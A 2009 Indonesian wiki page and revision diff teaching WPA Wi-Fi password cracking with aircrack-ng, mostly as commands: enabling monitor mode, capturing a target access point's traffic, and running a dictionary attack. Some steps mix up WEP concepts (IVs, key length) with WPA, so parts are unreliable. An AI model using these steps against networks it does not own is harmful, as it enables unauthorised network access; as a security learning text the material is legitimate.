Difference between revisions of "Teknik Menjebol WPA"

From OnnoWiki
Jump to navigation Jump to search
Line 71: Line 71:
  
 
==Referensi==
 
==Referensi==
 +
 +
* [http://www.aircrack-ng.org/doku.php?id=cracking_wpa Teknik menjebol WPA]
  
 
* http://www.aircrack-ng.org/doku.php?id=faq
 
* http://www.aircrack-ng.org/doku.php?id=faq

Revision as of 04:31, 26 November 2009

Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.


Menjebol WPA hampir tidak mungkin. Tapi kalau anda mau memaksa mencoba-nya bisa mencoba langkah berikut walaupun tidak ada jaminan sama sekali bahwa anda dapat menjebol-nya.



Misalnya,

BSSID    00:30:4F:4E:2B:50
WIFI     00:11:6b:33:d3:90
CHANNEL  2


Untuk memudahkan operasi ada baiknya melakukan di shell

export AP=00:30:4F:4E:2B:50
export WIFI=00:11:6b:33:d3:90
export CHANNEL=1

Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintah

airmon-ng start wlan0 1

Biasanya akan tampil kira-kira sebagai berikut

Interface	Chipset		Driver
wlan0		Intel 3945ABG	iwl3945 - [phy0]
				(monitor mode enabled on mon0)

Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.

Jalankan airodump di WLAN mon0

airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah

airodump-ng --output-format ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..


Kunci dari proses cracking WPA adalah ketersediaan kamus silahkan di cek ke

Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture.

Jalankan aircrack untuk mengcrack WPA

# aircrack-ng -a 2 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs -w kamuspass.txt

misalnya

# aircrack-ng -a 2 -e linksys -n 64 hasilcapture-01.ivs -w kamuspass.txt
# aircrack-ng -a 2 -e $AP -n 64 hasilcapture-01.ivs -w kamuspass.txt

Bisa juga menggunakan perintah

# aircrack-ng -a 2 -n 64 hasilcapture-01.ivs -w kamuspass.txt

Switch -a 2 digunakan untuk menset aircrack-ng agar meng-crack WPA


Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang sedang transfer file di jaringan HotSpot.

Referensi


Pranala Menarik